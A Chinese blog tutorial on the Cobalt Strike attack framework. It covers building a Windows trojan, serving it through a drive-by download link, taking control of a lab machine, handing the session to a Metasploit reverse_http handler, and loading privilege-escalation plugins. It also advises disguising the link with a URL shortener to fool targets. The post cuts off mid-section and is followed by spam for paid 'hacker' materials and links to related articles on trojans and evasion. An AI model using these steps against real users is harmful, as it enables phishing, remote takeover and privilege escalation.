Cobalt Strike渗透神器详解,网络安全详解

最新推荐文章于 2024-07-16 16:40:04 发布
最新推荐文章于 2024-07-16 16:40:04 发布
阅读量1k 收藏 9
点赞数 18
分类专栏: 2024年程序员学习 文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_60635321/article/details/137390443
版权
  • 选择生成攻击后门文件Attacks —> Packages —> Windows Executable

在这里插入图片描述
在这里插入图片描述

  • 将生成的木马文件保存到一个文件夹下;

在这里插入图片描述

钓鱼链接
  • 来到攻击模块Attacks —> Web drive-by —> Host file

在这里插入图片描述
在这里插入图片描述

  • 复制生成的链接;(注:小提一嘴,一般情况下直接发送链接很容易被识破,我们可以使用短链接生成器生成一个短链接,接着配合一些图片或页面,这样可以大大提高命中率,由于只是测试这里就不演示了哟,也是提供一个思路或方法

在这里插入图片描述

  • 将该恶意链接发送至目标靶机,当靶机用户访问时即会下载该木马文件;(注:需要关闭防火墙,杀毒软件等)

在这里插入图片描述

成功拿到shell
  • 假设靶机用户比较好奇,无意中点击执行了该恶意文件,返回到CS中可以看到目标已成功上线;

在这里插入图片描述

  • 拿到shell该怎么执行命令呢?别急别急,这就来了;

在这里插入图片描述

#查看IP信息
shell ipconfig
#查看用户
net user

在这里插入图片描述

  • 执行desktop命令,还可看到靶机用户桌面实时情况;

在这里插入图片描述

CS如何联动MSF

所需环境

攻击机(kali)
目标靶机(win 10)

前提条件
  • 必须确保目标靶机已成功上线,这里就不一一演示了哟;

在这里插入图片描述

MSF配置监听模块
  • kali打开msfconsole;

在这里插入图片描述

  • 设置模块,配置payload信息并执行攻击;

#使用监听模块
use exploit/multi/handler
#配置payload
set payload windows/meterpreter/reverse_http
#配置IP和端口
set lhost kali-ip
set lport 端口
#开始攻击
run/exploit

在这里插入图片描述

CS新建监听器
  • 在CS中新建一个监听器;

在这里插入图片描述

  • 配置一下基础的信息,值得注意的是IP和端口必须和msf监听的一致;

在这里插入图片描述

成功交互
  • 右击后点击Interact进入命令模式;

在这里插入图片描述

  • 接着点击Spawn添加,选择刚配置的监听payload;

在这里插入图片描述
在这里插入图片描述

  • 等待命令执行完即可;

在这里插入图片描述

  • 返回msf发现监听成功,成功进行交互;

在这里插入图片描述

CS如何进行提权操作

所需环境

攻击机(kali)
目标靶机(win 2008 R2)

前提条件
  • 还是必须确保目标靶机已成功上线哟;

在这里插入图片描述

查看用户权限
  • 打开视图命令,发现上线用户为普通用户;

在这里插入图片描述

  • 打开命令模式,执行getuid命令获取用户ID,有点慢稍等一会儿;

在这里插入图片描述

下载提权插件
  • CS里面含有自动化的提权,来到提权模块;

在这里插入图片描述

  • 默认提权的exp就只要下面这两个,肯定是不够的,所以得去加载一些提权的插件;

在这里插入图片描述

  • 下载ElevateKit提权插件;

在这里插入图片描述

  • 由于CS是在kali上,将该插件上传至kali以进行操作;

在这里插入图片描述

加载插件

自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。

深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
img
img
img
img
img
img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点,真正体系化!

由于文件比较大,这里只是将部分目录大纲截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新

如果你觉得这些内容对你有帮助,可以添加VX:vip204888 (备注网络安全获取)
img

还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!

王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。

对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!

【完整版领取方式在文末!!】

93道网络安全面试题

内容实在太多,不一一截图了

黑客学习资源推荐

最后给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

😝朋友们如果有需要的话,可以联系领取~

1️⃣零基础入门
① 学习路线

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

image

② 路线对应学习视频

同时每个成长路线对应的板块都有配套的视频提供:

image-20231025112050764

2️⃣视频配套工具&国内外网安书籍、文档
① 工具

② 视频

image1

③ 书籍

image2

资源较为敏感,未展示全面,需要的最下面获取

在这里插入图片描述在这里插入图片描述

② 简历模板

在这里插入图片描述

因篇幅有限,资料较为敏感仅展示部分资料,添加上方即可获取👆

一个人可以走的很快,但一群人才能走的更远。如果你从事以下工作或对以下感兴趣,欢迎戳这里加入程序员的圈子,让我们一起学习成长!

AI人工智能、Android移动开发、AIGC大模型、C C#、Go语言、Java、Linux运维、云计算、MySQL、PMP、网络安全、Python爬虫、UE5、UI设计、Unity3D、Web前端开发、产品经理、车载开发、大数据、鸿蒙、计算机网络、嵌入式物联网、软件测试、数据结构与算法、音视频开发、Flutter、IOS开发、PHP开发、.NET、安卓逆向、云计算

较为敏感仅展示部分资料,添加上方即可获取👆**

一个人可以走的很快,但一群人才能走的更远。如果你从事以下工作或对以下感兴趣,欢迎戳这里加入程序员的圈子,让我们一起学习成长!

AI人工智能、Android移动开发、AIGC大模型、C C#、Go语言、Java、Linux运维、云计算、MySQL、PMP、网络安全、Python爬虫、UE5、UI设计、Unity3D、Web前端开发、产品经理、车载开发、大数据、鸿蒙、计算机网络、嵌入式物联网、软件测试、数据结构与算法、音视频开发、Flutter、IOS开发、PHP开发、.NET、安卓逆向、云计算

m0_60635321
关注
  • 18
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
木马捆绑+签名修改(CobaltStrike免杀)
qq_32445755的博客
11-05 832
今天我们就来聊一下什么是,说起捆绑木马我相信一些人肯定觉得很陌生。在日常中我相信大家经常可能会遇到这样的一个问题,在一些网站上下载一个电脑软件结果电脑上就被莫名其妙的安装上了一个全家桶(流氓软件)。这就是通过简单的捆绑技术将一些你不需要的广告软件安装到你的电脑上。捆绑木马也是一样的只不过是更加的隐蔽。这里使用的是linux虚拟机生成木马文件需要安装一个winrar文件然后我们对木马文件进行签名处理。
[网络安全自学篇] 九十.远控木马详解及APT攻击中的远控和防御
杨秀璋的专栏
07-24 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了软件来源分析,结合APT攻击中常见的判断方法,利用Python调用扩展包进行溯源。这篇文章将详细分享远控木马及APT攻击中的远控,包括木马的基本概念和分类、木马的植入方式、远控木马的通信方式、APT攻击与远控木马等。作者之前分享了多篇木马的文章,但这篇更多是讲解远控型木马,基础性文章,希望对您有所帮助~
Cobalt Strike-域渗透
告白的博客
08-18 1235
0x00 域渗透介绍 所谓域渗透就是一次二次渗透,当我们已经拿到目标的shell后,而我们想做进一步的渗透叫做二次渗透,也叫后渗透,域渗透就是在同一个域内垂直或者水平渗透域内主机。今天模拟一个域渗透使用,使用Cobalt Strike上线域内主机,实现控制。 0x01 网络拓扑 目标:通过kali的Cobalt Strike上线域内所有主机,包括域控制器 补充一个知识:通常在真实环境下,通常会有三台以上的Cobalt Strike由于操作,且他们都单独的部署在vps上面,第一个是防止被发现隐蔽性更好,第
利用Cobalt Strike 通过exe木马实现远控
最新发布
m0_65852484的博客
07-16 363
一、打开finalshell,执行命令 ./teamserver IP 密码。五、将exe文件发送给目标电脑,在目标电脑上双击即可实现监听。Host:服务器IP,Port:端口,密码:服务器密码。三、打开 Cobalt Strike,连接服务器。二、在服务器设置想用端口,40304端口。四、连接成功后,生成exe文件。
CobaltStrike渗透进阶篇
2401_84466225的博客
06-19 1273
钓鱼攻击主要通过生成的木马诱使受害者运行后上线,其中木马一般都伪装成正常的程序。与此同时配合钓鱼网站可帮助攻击者模拟真实网站诱骗受害者访问,达到获取账号密码、上线木马等目的。接下来主要介绍后门程序的生成及钓鱼模块的使用,共包括以下几个层面克隆网站键盘记录克隆网站执行木马MSF配合CS钓鱼。
CobaltStrike使用-第六篇(域内渗透&横向扩展)
Love&Share
12-05 3426
本篇为CS使用系列第六篇文章,主要以一个案例来演示使用CS进行横向移动 文章目录域内渗透&横向扩展网络拓扑环境搭建1.主机枚举Windows 的内置命令PowerViewCS net模块2.用户枚举1.判断当前账号是否为管理员账号2.判断哪些账号是域管理员账号3.判断本地管理员3.利用文件操作使用WinRM运行命令Powersploit运行mimikatz 域内渗透&横向扩展 网络拓扑 从网络拓扑结构中分析得出 客户机win7具有双网卡,与攻击者在同一网段(192)可以直接访问,在现实中
Cobalt Strike使用教程一
热门推荐
迷风小白
10-24 7万+
0x00 简介 Cobalt Strike是一款基于java的渗透测试神器,常被业界人称为CS神器。自3.0以后已经不在使用Metasploit框架而作为一个独立的平台使用,分为客户端与服务端,服务端是一个,客户端可以有多个,非常适合团队协同作战,多个攻击者可以同时连接到一个团队服务器上,共享攻击资源与目标信息和sessions,可模拟APT做模拟对抗,进行内网渗透Cobalt Strike集...
Cobalt Strike渗透神器详解,【高级网络安全架构师系统学习
2301_76223496的博客
04-03 889
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
[原创]Ladon7.5大型内网渗透扫描器&Cobalt Strike
K8哥哥
11-10 1万+
Ladon一款用于大型网络渗透的多线程插件化综合扫描神器,含端口扫描、服务识别、网络资产、密码爆破、高危漏洞检测以及一键GetShell,支持批量A段/B段/C段以及跨网段扫描,支持URL、主机、域名列表扫描。5.5版本内置39个功能模块,通过多种协议以及方法快速获取目标网络存活主机IP、计算机名、工作组、共享资源、网卡地址、操作系统版本、网站、子域名、中间件、开放服务、路由器、数据库等信息,漏洞检测包含MS17010、Weblogic、ActiveMQ、Tomcat、Struts2等,密码爆破11种含数据
CobaltStrike介绍与安装使用及参数详解
hacker3062的博客
09-13 407
arp的中文释义是地址解析协议,全英文 address resolution protocol,是一个将局域网IP地址映射到网卡物理地址(MAC)的工作协议。模拟环境:我和小明是室友,而且我们连的是同一台路由器,我通过内网扫描可以扫描到他的电脑ip。一天晚上小明打游戏很晚,整个寝室全是他的游戏声音,严重干扰我睡觉,我就偷偷将我的电脑开了起来,进行了arp攻击,一分钟后小明无奈的关掉了电脑,直骂某运营商是*鸡。总结:该实验就是利用了arp协议欺骗要攻击的主机,使其认为我是网关,从而进行断网。
网安工具系列:CobaltStrike渗透框架
weixin_54626591的博客
01-14 74
CobaltStrike渗透框架
[钴击]Cobalt Strike内网渗透工具
qq_60115503的博客
09-04 1406
1.添加新的Cobalt Strik团队服务器2.删除当前的Cobalt Strik团队服务器3.新建一个监听器4.切换图形化会话按钮5.切换列表话会话按钮6.以列表方式显示目标7.密码凭证栏按钮8.下载文件列表9.键盘记录表10.屏幕截图表11.生成windows下可执行木马12.生成java签名的applet攻击13.生成office宏攻击14.生成powershell后门15.文件托管按钮16.管理web站点17.帮助文档18.关于。
渗透工具——cs(Cobalt Strike)简介
2301_78006725的博客
09-09 3556
CS 是Cobalt Strike的简称,是一款渗透测试神器,常被业界人称为CS神器Cobalt Strike已经不再使用MSF而是作为单独的平台使用,它分为客户端与服务端,服务端是一个,客户端可以有多个,可被团队进行分布式协团操作。3、Cobalt Strike可以引用其他的通讯框架ExternalC2,ExternalC2是由Cobalt Strike提出的一套规范/框架,它允许黑客根据需要对框架提供的默认HTTP(S)/DNS/SMB C2 通信通道进行扩展。Desktop(VNC) #桌面交互。
黑客必备利器:如何在系统上安装和使用 CobaltStrike(简称:CS)
weixin_43263566的博客
01-11 2万+
渗透测试之基本的攻击流程
148.网络安全渗透测试—[Cobalt Strike系列]—[HTTP Beacon基础使用/脚本web传递/屏幕截图/端口扫描]
qwsn
03-19 3365
一、Cobalt Strike基本使用 1、Cobalt Strike简介 2、Cobalt Strike(CS)整体框架图 二、Cobalt Strike简单使用 1、实验坏境 2、实验过程
渗透实战:内网域渗透
kali_Ma的博客
11-22 3万+
前言 本文记录了一次针对具有二层内网的域环境进行渗透测试的过程,文中涉及了内网域渗透的基本方法、思路和技巧。交替使用了msf、CobaltStrike、frp、chisel、SharpSQLTools等工具,最后通过约束委派拿下了域控。其间运用了很多小工具,文章较长,下面开始此次渗透长途之旅。 网络拓扑如下: web服务器 先来波端口扫描: 直接发现了内网的ip,这里需要提前说明一点,由于靶场搭建的问题,weblogic只在10.10.20.12这个ip上才能解析,所以需要调整下ip设置,等做完web
一次偶然的CobaltStrike木马钓鱼邮件分析
博客地址 www.sec0nd.top
08-02 2335
前几天看到一篇关于近期钓鱼邮件的情况统计的文章,挺有意思然后在逛某威胁感知社区的时候,看到了一个恶意url,也挺有意思子域名伪装成某安全公司hhh,然后看了下与之有关的通信样本好家伙全是钓鱼文件,免杀做的还不错,最近几天不知道为什么异常频繁于是就点进去几个看了看,分析分析这种是怎么实现cs上线的(纯小白,勿喷) 下面所有分析均为在线沙箱进行测试的结果。......
CobaltStrike windows木马原理分析
好好学习,天天向上
12-28 1417
本文主要介绍CobaltStrike windows型木马的原理,同Meterpreter大体类似。不同之处有使用了命名管道,使用了http的相关api来下载payload,同样使用的peb来获取api的地址,最后的后门是一个反射型dll。
CobaltStrike项目实战
永远相信美好的事情即将发生
05-14 665
模拟内网有三台机器:WEB、PC和DC。WEB服务器有两个网络适配器,适配器1处于NAT模式用于连接外网,适配器2用于内网。PC和WEB服务器一样,有两个适配器,能够同时访问外网和内网;DC作为域控制器,只有一个适配器,仅内网访问。
利用Cobalt Strike进行对手仿真的网络安全渗透测试
"对手仿真 com Cobalt Strike网络安全渗透测试中的一个重要概念,主要涉及利用敌对策略、技术和程序,模拟真实世界攻击者的行为,以测试和评估安全防御系统的有效性。这种技术由网络安全专家 Joas AS Santos 提到...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值